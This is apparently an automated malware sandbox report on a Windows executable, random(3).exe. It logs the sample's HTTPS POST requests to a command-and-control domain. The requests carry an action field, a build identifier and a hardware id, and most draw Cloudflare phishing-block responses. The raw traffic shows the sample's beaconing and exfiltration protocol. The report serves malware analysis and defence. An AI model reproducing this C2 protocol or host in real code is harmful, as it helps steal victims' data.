                        2025-03-05 08:16:49 UTC1013INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e
                        Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                        2025-03-05 08:16:49 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449733104.21.31.2084437468C:\Users\user\Desktop\random(3).exe
                        TimestampBytes transferredDirectionData
                        2025-03-05 08:16:51 UTC381OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=R8O1JPR0WPW2Q00M2I
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 2603
                        Host: explorebieology.run
                        2025-03-05 08:16:51 UTC2603OUTData Raw: 2d 2d 52 38 4f 31 4a 50 52 30 57 50 57 32 51 30 30 4d 32 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 52 38 4f 31 4a 50 52 30 57 50 57 32 51 30 30 4d 32 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 52 38 4f 31 4a 50 52 30 57 50 57 32 51 30 30 4d 32 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 38 4f 31 4a 50 52 30 57 50
                        Data Ascii: --R8O1JPR0WPW2Q00M2IContent-Disposition: form-data; name="act"send_message--R8O1JPR0WPW2Q00M2IContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--R8O1JPR0WPW2Q00M2IContent-Disposition: form-data; name="pid"1--R8O1JPR0WP
                        2025-03-05 08:16:51 UTC562INHTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0trmLZJ6HKorLNrdY1BcLIZ%2FtlS%2F%2Fqb5xOZaWhxCCGkwF8UB4p3zcJ8tm0%2FXhR9qTPX5QriTTU6t0%2F73OWiuMuuE0p5qbtOUoOGMC7WeJTy06jbPOkeF%2FPcIL1nQXh4ES2j56eQd"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 91b82c6fab2bb2c0-EWR
                        2025-03-05 08:16:51 UTC807INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:51 UTC1369INData Raw: 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e
                        Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
                        2025-03-05 08:16:51 UTC1369INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20
                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
                        2025-03-05 08:16:51 UTC1011INData Raw: 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50
                        Data Ascii: class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>P
                        2025-03-05 08:16:51 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.449734104.21.31.2084437468C:\Users\user\Desktop\random(3).exe
                        TimestampBytes transferredDirectionData
                        2025-03-05 08:16:51 UTC380OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=OK0048YRWNYO4Q3GT
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 1090
                        Host: explorebieology.run
                        2025-03-05 08:16:51 UTC1090OUTData Raw: 2d 2d 4f 4b 30 30 34 38 59 52 57 4e 59 4f 34 51 33 47 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 4f 4b 30 30 34 38 59 52 57 4e 59 4f 34 51 33 47 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 4f 4b 30 30 34 38 59 52 57 4e 59 4f 34 51 33 47 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 4b 30 30 34 38 59 52 57 4e 59 4f 34
                        Data Ascii: --OK0048YRWNYO4Q3GTContent-Disposition: form-data; name="act"send_message--OK0048YRWNYO4Q3GTContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--OK0048YRWNYO4Q3GTContent-Disposition: form-data; name="pid"1--OK0048YRWNYO4
                        2025-03-05 08:16:51 UTC556INHTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BiPaux6v1b0HNb3qxYmezt31JHTj2qTdQCHn0pN%2FPJjdTU83j7PioS%2F4SX864GXakme67138nOwjn0BuVMu3RwTjVaEfruJ7zpZQl30fUZ4Hme2Zq5OVLLDItUtT8riwY3809Z%2F6"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 91b82c741ac37a99-EWR
                        2025-03-05 08:16:51 UTC813INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:51 UTC1369INData Raw: 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28
                        Data Ascii: yles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById(
                        2025-03-05 08:16:51 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e
                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action
                        2025-03-05 08:16:51 UTC1005INData Raw: 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d
                        Data Ascii: "cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Perform
                        2025-03-05 08:16:51 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.449735104.21.31.2084437468C:\Users\user\Desktop\random(3).exe
                        TimestampBytes transferredDirectionData
                        2025-03-05 08:16:52 UTC364OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 89
                        Host: explorebieology.run
                        2025-03-05 08:16:52 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 26 6a 3d 26 68 77 69 64 3d 42 34 35 37 45 33 42 43 41 34 34 34 32 34 42 37 46 32 42 31 30 35 30 39 41 46 30 44 46 46 41 41
                        Data Ascii: act=get_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=&hwid=B457E3BCA44424B7F2B10509AF0DFFAA
                        2025-03-05 08:16:56 UTC272INHTTP/1.1 200 OK
                        Date: Wed, 05 Mar 2025 08:16:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Server: cloudflare
                        Vary: Accept-Encoding
                        Cf-Cache-Status: DYNAMIC
                        CF-RAY: 91b82c783ffe1b53-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-03-05 08:16:56 UTC54INData Raw: 33 30 0d 0a 47 7a 64 2b 4e 2b 66 48 6f 77 57 55 64 36 61 55 66 39 6c 74 33 41 65 66 5a 67 42 62 43 55 31 43 78 72 55 36 45 66 67 77 78 52 42 41 61 67 3d 3d 0d 0a
                        Data Ascii: 30Gzd+N+fHowWUd6aUf9lt3AefZgBbCU1CxrU6EfgwxRBAag==
                        2025-03-05 08:16:56 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:03:16:44
                        Start date:05/03/2025
                        Path:C:\Users\user\Desktop\random(3).exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\random(3).exe"
                        Imagebase:0x7f0000
                        File size:3'042'304 bytes
                        MD5 hash:8D0CBD77E8D4828AA0DF4BB88339F6AC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >